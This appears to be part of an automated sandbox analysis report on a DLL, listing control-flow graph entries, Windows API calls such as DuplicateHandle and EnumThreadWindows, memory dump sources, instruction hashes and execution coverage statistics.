                                                            • GetCurrentProcess.KERNEL32 ref: 00B55E70
                                                            • GetCurrentThreadId.KERNEL32 ref: 00B55EC9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: 78cff74a1c2d1c244bb30c409a9ce523a44cbe32e837d7a6aac96ea341babbc7
                                                            • Instruction ID: 00fcb21f10eaae56f55a11c8f591a8f37412d7d0c3685764bac151b59a70c576
                                                            • Opcode Fuzzy Hash: 78cff74a1c2d1c244bb30c409a9ce523a44cbe32e837d7a6aac96ea341babbc7
                                                            • Instruction Fuzzy Hash: 685179B09007498FEB14DFA9D948B9EBFF1EF88312F24809AD409A72A1D7745944CF66

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 00B55DF6
                                                            • GetCurrentThread.KERNEL32 ref: 00B55E33
                                                            • GetCurrentProcess.KERNEL32 ref: 00B55E70
                                                            • GetCurrentThreadId.KERNEL32 ref: 00B55EC9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: 7556b317ac301a450f35e2106711a1a8364c93d203553a392692bfa599e1ffbe
                                                            • Instruction ID: de567e34ffe5d0c280431017c0ddd1be1fa3b1f2ba407004998791e7af87b48a
                                                            • Opcode Fuzzy Hash: 7556b317ac301a450f35e2106711a1a8364c93d203553a392692bfa599e1ffbe
                                                            • Instruction Fuzzy Hash: FB5168B0900749CFEB14DFA9D948B9EBBF1FF88311F208499D409A7260D7746944CF66

                                                            Control-flow Graph

                                                            Control-flow graph (interactive graph not rendered): basic blocks b58218-b584ef; API calls GetActiveWindow, GetFocus, MessageBoxW; internal calls to b55758, b57d7c, b563ac, b57d8c, b57d98, b57da4
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID: ActiveFocusWindow
                                                            • String ID:
                                                            • API String ID: 2022189218-0
                                                            • Opcode ID: 5a2e045c68275e8c4a9025a09028c4e592d7bc23f9e6e627bc756bd3930f0999
                                                            • Instruction ID: 9760a79099bbdacdf40827ffed6bc6f177b94b3ee7b3dc65a7553c2386432715
                                                            • Opcode Fuzzy Hash: 5a2e045c68275e8c4a9025a09028c4e592d7bc23f9e6e627bc756bd3930f0999
                                                            • Instruction Fuzzy Hash: 9C9138B4A042498FDB14CFA9C984BAEBBF5FF48711F1584D9E804EB251CB74E848CB65

                                                            Control-flow Graph

                                                            Control-flow graph (interactive graph not rendered): basic blocks b54dbd-b552a3; API call GetActiveWindow; internal calls to b549f8, b54a04, b5571f, b55730, b55749, b55758
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID: ActiveWindow
                                                            • String ID:
                                                            • API String ID: 2558294473-0
                                                            • Opcode ID: af7c67e97375f079537921b78a0c397c9d496e1e97a2fc426caf89b823498542
                                                            • Instruction ID: 3e63670184f6360f06323aae824ca9a8c485bf4359be2d47a4f564d2e88e4a40
                                                            • Opcode Fuzzy Hash: af7c67e97375f079537921b78a0c397c9d496e1e97a2fc426caf89b823498542
                                                            • Instruction Fuzzy Hash: DCC1A171F003199FDB189FB494547AE7BE2EF89301F148468E80AEB395DF389C468B65

                                                            Control-flow Graph

                                                            Control-flow graph (interactive graph not rendered): basic blocks b56387-b56482; API call DuplicateHandle
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B5644F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 0350e2acdc82aa4652f4d1836ec1c075142fbb1c7aa78f64146500b3b7dbc451
                                                            • Instruction ID: 03fa741b6f5ef247120e6ff683ccd24256948d3bada7df19e85759e157e60d61
                                                            • Opcode Fuzzy Hash: 0350e2acdc82aa4652f4d1836ec1c075142fbb1c7aa78f64146500b3b7dbc451
                                                            • Instruction Fuzzy Hash: FF3188B18053889FDB12CFA9D884ADEBFF4EF09310F14409AE844EB261D3789949CF61

                                                            Control-flow Graph

                                                            Control-flow graph (interactive graph not rendered): basic blocks b57bb0-b57c9d; API call GetCurrentThreadId; internal call to b56394
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00B57C42
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID: CurrentThread
                                                            • String ID:
                                                            • API String ID: 2882836952-0
                                                            • Opcode ID: af00404995580b4025767ef763b4d0250790ac4fee4b4cf793f65869c5c386e5
                                                            • Instruction ID: 08e681fef3ed5ccf397c85798814ae69c69f57b34bcfa02a00d1f295d810330b
                                                            • Opcode Fuzzy Hash: af00404995580b4025767ef763b4d0250790ac4fee4b4cf793f65869c5c386e5
                                                            • Instruction Fuzzy Hash: BE3148B1A0024A8FCB10DF99D844B9EFFF1FB48314F1485AAD418AB352D374A944CFA6

                                                            Control-flow Graph

                                                            Control-flow graph (interactive graph not rendered): basic blocks b563c8-b56482; API call DuplicateHandle
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B5644F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 6c02fa2d5a94f0060d44adc5ad154f4c40c7e5081d740868be7db91b0760474c
                                                            • Instruction ID: 273a24ff2d29f89ed6c75155586212a6ab1b551f8e7a38729397117e1ff6429b
                                                            • Opcode Fuzzy Hash: 6c02fa2d5a94f0060d44adc5ad154f4c40c7e5081d740868be7db91b0760474c
                                                            • Instruction Fuzzy Hash: D821D5B59003499FDB10CFAAD884ADEFBF9FB48320F14845AE918A3350D375A954CF65

                                                            Control-flow Graph

                                                            Control-flow graph (interactive graph not rendered): basic blocks b58440-b584ef; API call MessageBoxW
                                                            APIs
                                                            • MessageBoxW.USER32(?,00000000,00000000,?), ref: 00B584C5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID:
                                                            • API String ID: 2030045667-0
                                                            • Opcode ID: abdf0bc6e78c252119c790b0e90de592e3ba500092d0861de184049b8dceb1d8
                                                            • Instruction ID: 5e430307ecb5d520582613d26d9ebc8291309502f5397db410852d678d608cc5
                                                            • Opcode Fuzzy Hash: abdf0bc6e78c252119c790b0e90de592e3ba500092d0861de184049b8dceb1d8
                                                            • Instruction Fuzzy Hash: 3E2112B6C0034A9FDB10CF9AD884ADEBBF5FB48310F10896ED819A7600C3756948CFA0

                                                            Control-flow Graph

                                                            Control-flow graph (interactive graph not rendered): basic blocks b57cb0-b57d64; API call EnumThreadWindows
                                                            APIs
                                                            • EnumThreadWindows.USER32(?,00000000,?), ref: 00B57D21
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID: EnumThreadWindows
                                                            • String ID:
                                                            • API String ID: 2941952884-0
                                                            • Opcode ID: a2ba59be8b2840743232105d98390cbf2a56d5b39d406a69697bd69f14e6c1d2
                                                            • Instruction ID: 8753eed4b26b0d33aaab26659c2434168968c98e5c1c7b6a0b49cb251b741310
                                                            • Opcode Fuzzy Hash: a2ba59be8b2840743232105d98390cbf2a56d5b39d406a69697bd69f14e6c1d2
                                                            • Instruction Fuzzy Hash: 312129719002498FDB14CF9AD844BEEFBF5EB88320F148469D814A3250D774A944CFA4

                                                            Control-flow Graph

                                                            Control-flow graph (interactive graph not rendered): basic blocks b57ca9-b57d64; API call EnumThreadWindows
                                                            APIs
                                                            • EnumThreadWindows.USER32(?,00000000,?), ref: 00B57D21
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID: EnumThreadWindows
                                                            • String ID:
                                                            • API String ID: 2941952884-0
                                                            • Opcode ID: a1af82333c559fb6d7e86a26e43a3ecc8fdbe6c85f4fe35f36645f958cfe7199
                                                            • Instruction ID: d0b0e1c8337e902c22f0653ecb312ba0a694ffa4d684f2fa3abc08dadb02334a
                                                            • Opcode Fuzzy Hash: a1af82333c559fb6d7e86a26e43a3ecc8fdbe6c85f4fe35f36645f958cfe7199
                                                            • Instruction Fuzzy Hash: 3721E8B1A002498FDB14CF9AD944BAEFBF5FF48320F14846AD854A7250D7749945CF64

                                                            Control-flow Graph

                                                            Control-flow graph (interactive graph not rendered): basic blocks b58448-b584ef; API call MessageBoxW
                                                            APIs
                                                            • MessageBoxW.USER32(?,00000000,00000000,?), ref: 00B584C5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID:
                                                            • API String ID: 2030045667-0
                                                            • Opcode ID: 64868ce7b3cf3474b0a65dceb7e5c27324cab2e8e64dda1ba3b40c8bf8c93a3d
                                                            • Instruction ID: b861f4f6b7e0455f9f82c45743cbfb4fc6eb50e7abbb1a1c4f109afd6d3aa9aa
                                                            • Opcode Fuzzy Hash: 64868ce7b3cf3474b0a65dceb7e5c27324cab2e8e64dda1ba3b40c8bf8c93a3d
                                                            • Instruction Fuzzy Hash: BA21F0B690034A9FDB10CF9AD884ADEBBF5FB48310F10846AD918A7200C775A948CFA0

                                                            Control-flow Graph

                                                            Control-flow graph (interactive graph not rendered): basic blocks b56328-b56e78; API call OleInitialize
                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 00B56E45
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID:
                                                            • API String ID: 2538663250-0
                                                            • Opcode ID: baadb4b3a3cb01fb22d40568b9de865d3dd6ad4d3dbce58a43aa9360bbcc66c8
                                                            • Instruction ID: b2d4a4ed78cea5984de660372955a24097a29bdc8a301f9d20a028cf837499e4
                                                            • Opcode Fuzzy Hash: baadb4b3a3cb01fb22d40568b9de865d3dd6ad4d3dbce58a43aa9360bbcc66c8
                                                            • Instruction Fuzzy Hash: B11115B59003498FCB20DF9AC445B9EFBF4EB48324F208469D518A7250C775A944CFA5

                                                            Control-flow Graph

                                                            Control-flow graph (interactive graph not rendered): basic blocks b56de8-b56e78; API call OleInitialize
                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 00B56E45
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID:
                                                            • API String ID: 2538663250-0
                                                            • Opcode ID: 89c791c8a35eb1d92d05accc933c25e98aabac1dbddab2d037e878b62541320f
                                                            • Instruction ID: b7ea3f963f5495acdfd6f283c4cdb9e71ea07b27cab34b59e21328abe648b028
                                                            • Opcode Fuzzy Hash: 89c791c8a35eb1d92d05accc933c25e98aabac1dbddab2d037e878b62541320f
                                                            • Instruction Fuzzy Hash: D91157B58003498FDB20DFAAC5457CEFBF4EF48324F208459D958A7250C379A944CFA1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1677291882.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_73d000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc9f871e7989b28fddbf9f3fb0fbdb91f6449880b7c9721d0e341756aa90dab8
                                                            • Instruction ID: 740a3bf9b185c79def3a0b07955b59beb36de5aaf05e20caa820a6f3b8cff1af
                                                            • Opcode Fuzzy Hash: fc9f871e7989b28fddbf9f3fb0fbdb91f6449880b7c9721d0e341756aa90dab8
                                                            • Instruction Fuzzy Hash: BB11B9B16443449FFB28EF24E984B26BB65F784B14F208A6DD5494B242C37EDC47C662
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1677291882.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_73d000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 69cb109f1ebf70991b3efe2666d10f64516dda1397b1d354b9c9d73876fab4c4
                                                            • Instruction ID: b52a0bfa1311fb2d7a0678812ef1b5a9d280b276f9ef6d678158749ecd1e2ad7
                                                            • Opcode Fuzzy Hash: 69cb109f1ebf70991b3efe2666d10f64516dda1397b1d354b9c9d73876fab4c4
                                                            • Instruction Fuzzy Hash: 940126B1504784CFEB25EF14E5C4715BFA1FB40714F208AA9D8894B243C33ED846CB62
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e6e909fd9322f20f9f102881824f244f2d851d04de253eada1a34eb097079e53
                                                            • Instruction ID: 7e63af282290171708881d752c490171e4b60c5690bd83284564adcc7c7a68f0
                                                            • Opcode Fuzzy Hash: e6e909fd9322f20f9f102881824f244f2d851d04de253eada1a34eb097079e53
                                                            • Instruction Fuzzy Hash: F41276F9901F468BE310CF65EE8C38D3BB1BB86728B904219D6611B2F6D7B9154ACF44
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1678338991.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_loaddll32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e5025b078967fd85162d849e6098edee8e8ef69a15d09e8a1ef35b4e29b96f51
                                                            • Instruction ID: 8e809138330a853fa05c1bcc4f770dd2f061f360ca5fae9c0584ec4db0d4fb5f
                                                            • Opcode Fuzzy Hash: e5025b078967fd85162d849e6098edee8e8ef69a15d09e8a1ef35b4e29b96f51
                                                            • Instruction Fuzzy Hash: 36C1E6B9901B468BD710CF65EE8838D7BB1BF86324F504319D6612B2F6DBB8144ACF44

                                                            Execution Graph

                                                            Execution Coverage: 5.1%
                                                            Dynamic/Decrypted Code Coverage: 100%
                                                            Signature Coverage: 0%
                                                            Total number of Nodes: 18
                                                            Total number of Limit Nodes: 0
                                                            Execution graph (interactive graph not rendered): paths through 43263c8 (DuplicateHandle), 4328448-4328463 (MessageBoxW) and 43269df-4326238-4327bb0/4327bc0-4326394-4327cb0 (EnumThreadWindows)

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1625211278.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_4320000_regsvr32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0a7fed30b742ef56922f27cbbdb94a27dd705898fb494972ff8dd2c4c83dc0d7
                                                            • Instruction ID: 62db6c2f012737515318d3c282c3fa0cbd431c29a0a3fe006e6041b10d81d399
                                                            • Opcode Fuzzy Hash: 0a7fed30b742ef56922f27cbbdb94a27dd705898fb494972ff8dd2c4c83dc0d7
                                                            • Instruction Fuzzy Hash: CDA169B4A003598FDB18DFA9CA84BAFBBF5FF48314F159559E804AB251C734E841CB61

                                                            Control-flow Graph
                                                            • Rendered graph (executed / not executed block colouring not recoverable as text); basic blocks 43283f1-43284ef, MessageBoxW called from block 432849f-43284d2
                                                            APIs
                                                            • MessageBoxW.USER32(?,00000000,00000000,?,?), ref: 043284C5
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1625211278.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_4320000_regsvr32.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID:
                                                            • API String ID: 2030045667-0
                                                            • Opcode ID: b410e6f1b5cef0bec789f67b4a4f442f18ccdbf22a7d42e47e6b7e52a8e8c341
                                                            • Instruction ID: 645f59854a8f6a20dcb130399b97f602bc0e5c2676c0b2cfe86cba75f2881b7d
                                                            • Opcode Fuzzy Hash: b410e6f1b5cef0bec789f67b4a4f442f18ccdbf22a7d42e47e6b7e52a8e8c341
                                                            • Instruction Fuzzy Hash: A12187B59007198FDB18DF99D984BDABBF5FF88314F24851DE419AB620C774A801CF60

                                                            Control-flow Graph
                                                            • Rendered graph (executed / not executed block colouring not recoverable as text); basic blocks 4326387-4327d64, EnumThreadWindows called from block 4327cfe-4327d2e
                                                            APIs
                                                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E58,?,?,04327C90,056C40EC,?), ref: 04327D21
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1625211278.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_4320000_regsvr32.jbxd
                                                            Similarity
                                                            • API ID: EnumThreadWindows
                                                            • String ID:
                                                            • API String ID: 2941952884-0
                                                            • Opcode ID: a79af812cfd13f667596338413888aa6db190ab5eaa444bc8c1192be0077a30b
                                                            • Instruction ID: 6e41ee116b62920ab594682dd535987209434a41b00d79431d4a2d81851b276e
                                                            • Opcode Fuzzy Hash: a79af812cfd13f667596338413888aa6db190ab5eaa444bc8c1192be0077a30b
                                                            • Instruction Fuzzy Hash: AE2139B190025A9FDB14CF9AC984BEFBBF4FF88320F14942AD454A3250D778A945CF65

                                                            Control-flow Graph
                                                            • Rendered graph (executed / not executed block colouring not recoverable as text); basic blocks 43263c1-4326482, DuplicateHandle called from block 43263c1-432645c
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0432644F
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1625211278.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_4320000_regsvr32.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 296fcc3e51457334c72f46cc7ab6947715c023961930241ebfc31edda807350a
                                                            • Instruction ID: 25a904bd285f02aa643e7cecffa4be6cebcd6db1bdcf97fbbb8973a40a955ec1
                                                            • Opcode Fuzzy Hash: 296fcc3e51457334c72f46cc7ab6947715c023961930241ebfc31edda807350a
                                                            • Instruction Fuzzy Hash: 8321E3B5900259DFDB10CFAAD984AEEBBF4EB48320F14841AE958A3310C778A945CF64

                                                            Control-flow Graph
                                                            • Rendered graph (executed / not executed block colouring not recoverable as text); basic blocks 4326394-4327d64, EnumThreadWindows called from block 4327cfe-4327d2e
                                                            APIs
                                                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E58,?,?,04327C90,056C40EC,?), ref: 04327D21
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1625211278.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_4320000_regsvr32.jbxd
                                                            Similarity
                                                            • API ID: EnumThreadWindows
                                                            • String ID:
                                                            • API String ID: 2941952884-0
                                                            • Opcode ID: ae6702a2d4e2fb11ee9fb5cb68db2a54bef510cb8572cb4aca91c75b27108876
                                                            • Instruction ID: 3d017e85242c0410d45ef0ec9eb8b8145bff15e403b73249ad8db67d062613b7
                                                            • Opcode Fuzzy Hash: ae6702a2d4e2fb11ee9fb5cb68db2a54bef510cb8572cb4aca91c75b27108876
                                                            • Instruction Fuzzy Hash: EC2129719006598FEB14CF9AC944BEEFBF5FB88320F14842AD814A3250D778A945CFA5

                                                            Control-flow Graph
                                                            • Rendered graph (executed / not executed block colouring not recoverable as text); basic blocks 43263c8-4326482, DuplicateHandle called from block 43263c8-432645c
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0432644F
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1625211278.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_4320000_regsvr32.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: f46781535441482839caeaaa7978bd2686b07b9dc120d6094f007bb100fd4eed
                                                            • Instruction ID: 46b9a98345af73700a307f011a030b5eeaf6149e99e19849dcc37d7815750672
                                                            • Opcode Fuzzy Hash: f46781535441482839caeaaa7978bd2686b07b9dc120d6094f007bb100fd4eed
                                                            • Instruction Fuzzy Hash: 2F21E4B59003599FDB10CFAAD984ADEBBF4EB48720F14841AE958A3310D778A944CF61

                                                            Control-flow Graph
                                                            • Rendered graph (executed / not executed block colouring not recoverable as text); basic blocks 4327ca9-4327d64, EnumThreadWindows called from block 4327cfe-4327d2e
                                                            APIs
                                                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E58,?,?,04327C90,056C40EC,?), ref: 04327D21
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1625211278.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_4320000_regsvr32.jbxd
                                                            Similarity
                                                            • API ID: EnumThreadWindows
                                                            • String ID:
                                                            • API String ID: 2941952884-0
                                                            • Opcode ID: 4f5d24c8e52c84150b85205f0756f49b4ec2f613d18b456c47bd580b76fbee87
                                                            • Instruction ID: 08a5f644c369380f15313dece58576e56fd0c977f9736db14397b6c88d53436f
                                                            • Opcode Fuzzy Hash: 4f5d24c8e52c84150b85205f0756f49b4ec2f613d18b456c47bd580b76fbee87
                                                            • Instruction Fuzzy Hash: D52129719002598FDB14CF9AC944BEEFBF5FB88320F14842AD454A3250D778A945CFA5

                                                            Control-flow Graph
                                                            • Rendered graph (executed / not executed block colouring not recoverable as text); basic blocks 4328440-43284ef, MessageBoxW called from block 432849f-43284d2
                                                            APIs
                                                            • MessageBoxW.USER32(?,00000000,00000000,?,?), ref: 043284C5
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1625211278.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_4320000_regsvr32.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID:
                                                            • API String ID: 2030045667-0
                                                            • Opcode ID: cdda297f2c647c24eecc15248f48fac392639b46076f642e3d7d273f403018b1
                                                            • Instruction ID: edc296c6c77876e4f588c3e4766472a5259f0cde68376f1707e25e003e5c692d
                                                            • Opcode Fuzzy Hash: cdda297f2c647c24eecc15248f48fac392639b46076f642e3d7d273f403018b1
                                                            • Instruction Fuzzy Hash: 382134B68007599FDB14CF9AC984ADEFBF5FB48314F10852EE418A7600C374A944CBA0

                                                            Control-flow Graph
                                                            • Rendered graph (executed / not executed block colouring not recoverable as text); basic blocks 4328448-43284ef, MessageBoxW called from block 432849f-43284d2
                                                            APIs
                                                            • MessageBoxW.USER32(?,00000000,00000000,?,?), ref: 043284C5
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1625211278.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_4320000_regsvr32.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID:
                                                            • API String ID: 2030045667-0
                                                            • Opcode ID: 2a6c1da5996f57ae52cd74754bbe6dd3ceb9c6e92f78c8fa11214a8448a2be3a
                                                            • Instruction ID: c614505eeac30dbb3951a3874f05adf9b25e2900fa2c6f64cf0f7d53a642645a
                                                            • Opcode Fuzzy Hash: 2a6c1da5996f57ae52cd74754bbe6dd3ceb9c6e92f78c8fa11214a8448a2be3a
                                                            • Instruction Fuzzy Hash: 062113B68007599FDB14DF9AD984ADEFBB5FB48314F14892ED518A7600C374A544CBA0
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1624914646.000000000427D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0427D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_427d000_regsvr32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f2a06e7758a0e934981d2417afd3957809f59caee92ee3c44c8b4cb45858eb19
                                                            • Instruction ID: 6cc595c1d175871453ab3b6f1fcb1ecd4b463ceba4b5cca4e0311f701161d93a
                                                            • Opcode Fuzzy Hash: f2a06e7758a0e934981d2417afd3957809f59caee92ee3c44c8b4cb45858eb19
                                                            • Instruction Fuzzy Hash: 971174B17783409FEB10EF24E9C4B26BBA4FF80714F208A6CD4094B241D37AE447C662
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1624914646.000000000427D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0427D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_427d000_regsvr32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f1c1b2292c77ff2163261a03acf8243405760f1c3d7328999ce831efd2f5a938
                                                            • Instruction ID: f925c83af2496d06994d105b6d1108f03138d1c6e2918c826aaa8adf41d1696a
                                                            • Opcode Fuzzy Hash: f1c1b2292c77ff2163261a03acf8243405760f1c3d7328999ce831efd2f5a938
                                                            • Instruction Fuzzy Hash: 5811A3716197C08FDB12DF24D994715BF71EF42314F288AEAC489CB693C33A944ACB62

                                                            Execution Graph

                                                            Execution Coverage:4.4%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:53
                                                            Total number of Limit Nodes:1
